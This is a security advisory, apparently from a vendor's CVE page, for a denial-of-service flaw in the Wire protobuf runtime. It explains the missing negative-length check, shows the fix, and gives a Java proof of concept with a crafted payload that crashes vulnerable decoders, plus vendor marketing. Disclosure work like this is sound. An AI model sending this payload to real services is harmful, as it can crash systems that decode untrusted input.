CVE-2026-45799

CVE-2026-45799 is a high-severity security vulnerability in com.squareup.wire:wire-runtime-jvm (maven), affecting versions <= 5.3.3. It is fixed in 6.3.0, 7.0.0-alpha03.

Summary

CVE-2026-45799

Maintainer summary

Wire's protobuf group-skipping logic did not reject negative lengths before skipping a
length-delimited field inside a group. A crafted protobuf payload could cause Wire to throw an
unchecked runtime exception during decoding instead of the documented IOException /
ProtocolException failure path.

This can crash services that decode untrusted protobuf payloads and only handle Wire's documented
checked decoding failures.

Affected artifacts

com.squareup.wire:wire-runtime

Affected versions: vulnerable releases before 6.3.0.

Patched versions: 6.3.0 and later.

Users should upgrade to com.squareup.wire:wire-runtime:6.3.0 or later.

com.squareup.wire:wire-runtime-jvm

Affected versions: vulnerable legacy releases, including 5.3.1 and 5.3.3.

Patched versions: none.

com.squareup.wire:wire-runtime-jvm is a discontinued legacy artifact and will not receive a
patched release. Users should migrate to com.squareup.wire:wire-runtime:6.3.0 or later.

Wire 7 alpha releases

The fix has been merged to master and will be included in the next Wire 7 alpha release. Until
that release is available, Wire 7 alpha users should avoid decoding untrusted protobuf payloads with
affected alpha versions or build from a commit containing the fix.

Credit

Reported by @TrekLaps.

Technical details

The following technical details are based on the original report, updated by the maintainers to
reflect the assigned CVE, the supported fixed artifact, and the discontinued status of
com.squareup.wire:wire-runtime-jvm.

ByteArrayProtoReader32.skipGroup() in wire-runtime did not validate that a
LENGTH_DELIMITED field's length is non-negative before calling skip(). A crafted protobuf
varint encodes -128 as a signed Int. When skip(-128) runs, the internal position counter
underflows to an invalid negative position. The next readByte() accesses the source with that
negative position, throwing ArrayIndexOutOfBoundsException, a RuntimeException that escapes
Wire's documented IOException boundary and can crash the request handler.

ProtoAdapter.decode(byte[]) is declared to throw IOException. Callers following the documented
API may catch only IOException, so unchecked runtime exceptions from malformed input can escape
the expected error boundary.

The originally confirmed vulnerable legacy versions include 5.3.1 and 5.3.3 for the
discontinued com.squareup.wire:wire-runtime-jvm coordinate. The supported replacement coordinate
is com.squareup.wire:wire-runtime, fixed in version 6.3.0.

Root cause

In the originally reported vulnerable code path, ByteArrayProtoReader32.skipGroup() read the
length as a signed Int and used it without validating that it was non-negative:

STATE_LENGTH_DELIMITED -> {
  val length = internalReadVarint32() // returns signed Int and can be negative
  skip(length)                        // no negative check
}

The internal skip() implementation then accepted the negative count because the computed
position was not greater than the limit:

private fun skip(byteCount: Int) {
  val newPos = pos + byteCount        // for example, 7 + (-128) = -121
  if (newPos > limit) throw EOFException()
  pos = newPos                        // pos = -121
}

The next read could then index the source with the invalid negative position:

private fun readByte(): Byte {
  if (pos == limit) throw EOFException()
  return source[pos++]                // source[-121] throws ArrayIndexOutOfBoundsException
}

Wire already rejected negative lengths in normal length-delimited field decoding. The same
validation was missing from group-skipping code.

The fix adds this validation when skipping groups:

STATE_LENGTH_DELIMITED -> {
  val length = internalReadVarint32()
  if (length < 0) throw ProtocolException("Negative length: $length...")
  skip(length)
}

The fix was applied to both ByteArrayProtoReader32.skipGroup() and ProtoReader.skipGroup().

Reproduction

The following reproduction was provided for vulnerable legacy wire-runtime-jvm releases such as
5.3.1 and 5.3.3:

curl -sL https://repo1.maven.org/maven2/com/squareup/wire/wire-runtime-jvm/5.3.3/wire-runtime-jvm-5.3.3.jar -o wire.jar
curl -sL https://repo1.maven.org/maven2/com/squareup/okio/okio-jvm/3.9.1/okio-jvm-3.9.1.jar -o okio.jar
curl -sL https://repo1.maven.org/maven2/org/jetbrains/kotlin/kotlin-stdlib/2.1.0/kotlin-stdlib-2.1.0.jar -o stdlib.jar
// WirePoc.java
import com.squareup.wire.AnyMessage;

public class WirePoc {
  public static void main(String[] args) throws Exception {
    byte[] payload = new byte[] {
      (byte) 0x9B, 0x06,                                          // field 99, START_GROUP
      0x0A,                                                       // field 1, LENGTH_DELIMITED
      (byte) 0x80, (byte) 0xFF, (byte) 0xFF, (byte) 0xFF, 0x0F,   // varint = -128
      (byte) 0x9C, 0x06                                           // field 99, END_GROUP
    };

    AnyMessage.ADAPTER.decode(payload);
  }
}
javac -cp "wire.jar:okio.jar:stdlib.jar" WirePoc.java
java -cp ".:wire.jar:okio.jar:stdlib.jar" WirePoc

Observed output on vulnerable versions:

Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: Index -120 out of bounds for length 10
    at com.squareup.wire.ByteArrayProtoReader32.readByte(ByteArrayProtoReader32.kt:448)
    at com.squareup.wire.ByteArrayProtoReader32.internalReadVarint32(ByteArrayProtoReader32.kt:294)
    at com.squareup.wire.ByteArrayProtoReader32.skipGroup(ByteArrayProtoReader32.kt:209)
    at com.squareup.wire.ByteArrayProtoReader32.nextTag(ByteArrayProtoReader32.kt:156)
    at com.squareup.wire.AnyMessage$Companion$ADAPTER$1.decode(AnyMessage.kt:150)
    at com.squareup.wire.AnyMessage$Companion$ADAPTER$1.decode(AnyMessage.kt:88)
    at com.squareup.wire.ProtoAdapter.decode(ProtoAdapter.kt:468)
    at WirePoc.main(WirePoc.java:10)

With the fix, the same payload is rejected with ProtocolException.

Why this can affect any Wire-decoding service

skipGroup() is called for any unknown field with wire type 3. An attacker can send an unknown
field, such as field 99, with wire type START_GROUP. The decoder skips it via skipGroup()
regardless of which message type the service uses, so no schema knowledge is required.

Payload:

9b060a80ffffff0f9c06

Payload breakdown:

0x9B 0x06                 field 99, wire type 3 (START_GROUP)
0x0A                      field 1, wire type 2 (LENGTH_DELIMITED) inside group
0x80 0xFF 0xFF 0xFF 0x0F  5-byte varint = -128 as signed Int
0x9C 0x06                 field 99, END_GROUP

Impact

CVE-2026-45799 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (6.3.0, 7.0.0-alpha03); upgrading removes the vulnerable code path.

Affected versions

com.squareup.wire:wire-runtime-jvm (<= 5.3.3) com.squareup.wire:wire-runtime (<= 6.2.0) com.squareup.wire:wire-runtime (>= 7.0.0-alpha01, <= 7.0.0-alpha02)

Security releases

com.squareup.wire:wire-runtime → 6.3.0 (maven) com.squareup.wire:wire-runtime → 7.0.0-alpha03 (maven)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

The issue is fixed in Wire 6.3.0.

The fix rejects negative lengths while skipping groups and throws ProtocolException instead of
allowing the reader to move to an invalid position and later throw an unchecked runtime exception.

Frequently Asked Questions

  1. What is CVE-2026-45799? CVE-2026-45799 is a high-severity security vulnerability in com.squareup.wire:wire-runtime-jvm (maven), affecting versions <= 5.3.3. It is fixed in 6.3.0, 7.0.0-alpha03.
  2. How severe is CVE-2026-45799? CVE-2026-45799 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which packages are affected by CVE-2026-45799?
    • com.squareup.wire:wire-runtime-jvm (maven) (versions <= 5.3.3)
    • com.squareup.wire:wire-runtime (maven) (versions <= 6.2.0)
  4. Is there a fix for CVE-2026-45799? Yes. CVE-2026-45799 is fixed in 6.3.0, 7.0.0-alpha03. Upgrade to this version or later.
  5. Is CVE-2026-45799 exploitable, and should I be worried? Whether CVE-2026-45799 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-45799 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-45799?
    • Upgrade com.squareup.wire:wire-runtime to 6.3.0 or later
    • Upgrade com.squareup.wire:wire-runtime to 7.0.0-alpha03 or later

Other vulnerabilities in com.squareup.wire:wire-runtime-jvm

Stop the waste.
Protect your environment with Kodem.